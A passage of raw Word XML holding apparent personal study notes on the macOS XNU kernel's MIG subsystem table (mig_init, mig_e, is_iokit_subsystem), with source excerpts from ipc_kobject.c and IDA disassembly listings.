          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reply</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B25045" w:rsidRPr="005E36D3" w:rsidRDefault="00B25045" w:rsidP="00B1522D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E36D3" w:rsidRDefault="005E36D3" w:rsidP="005E36D3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(kernel)mig_init</w:t>
      </w:r>
      <w:r w:rsidR="006100CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E36D3" w:rsidRPr="005E36D3" w:rsidRDefault="005E36D3" w:rsidP="005E36D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>mig_init function</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>initializes mig_buckets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E36D3" w:rsidRDefault="005E36D3" w:rsidP="005E36D3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(kernel)mig_e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006100CF" w:rsidRDefault="005E36D3" w:rsidP="006100CF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>mig_e stores all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>subsystem definitions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="006100CF" w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\kern\ipc_kobject.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006100CF" w:rsidRDefault="006100CF" w:rsidP="006100CF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>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w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_e</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </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_vm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_por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_hos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host_priv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host_security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clock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clock_priv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processor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processor_se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b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_ioki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lock_se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task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thread_act_subsyste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b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#if</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VM32_SUPPOR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vm32_map_subsyste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b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</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UNDReply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default_pager_object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_voucher_subsystem</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</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_voucher_attr_control_subsyste</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#if</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XK_PROXY</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do_uproxy_xk_uproxy_subsyste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b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* XK_PROXY */</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#if</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MACHINE_ROUTINES</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ACHINE_SUBSYSTE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b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* MACH_MACHINE_ROUTINES */</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#if</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MCMSG</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iPSC860</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_subsystem</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*)&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mcmsg_info_subsystem</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* MCMSG &amp;&amp; iPSC860 */</w:t>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006100CF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</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__data:FFFFFF8000E2B410 ; const mig_subsystem *mig_e[18]</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mig_e           dq offset mach_vm_subsystem_0, offset </w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_port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__data:FFFFFF8000E2B410                                         ; DATA XREF: mig_init+22o</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__data:FFFFFF8000E2B410                                         ; mig_init+88o ...</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mach_host_subsystem_0, offset </w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>host_priv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host_security_subsystem_0, </w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>offset clock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clock_priv_subsystem_0, offset </w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>processor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processor_set_subsystem_0, offset </w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_iokit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lock_set_subsystem_0, offset </w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>task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thread_act_subsystem_0, offset </w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vm32_map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UNDReply_subsystem_0, offset </w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default_pager_object_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">__data:FFFFFF8000E2B410                 dq offset mach_voucher_subsystem_0, offset </w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_voucher_attr_control_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:t>mig_subsystem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:t>is_iokit_subsystem</w:t>
      </w:r>
      <w:r w:rsidR="00FA2C7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 public is_iokit_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0 ; const is_iokit_subsystem is_iokit_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0 is_iokit_subsystem_0 dq offset iokit_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                                         ; DATA XREF: iokit_server_routine:loc_FFFFFF8000482F82o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                                         ; iokit_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E05CD0                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>0AF0h</w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; start</w:t>
      </w:r>
    </w:p>
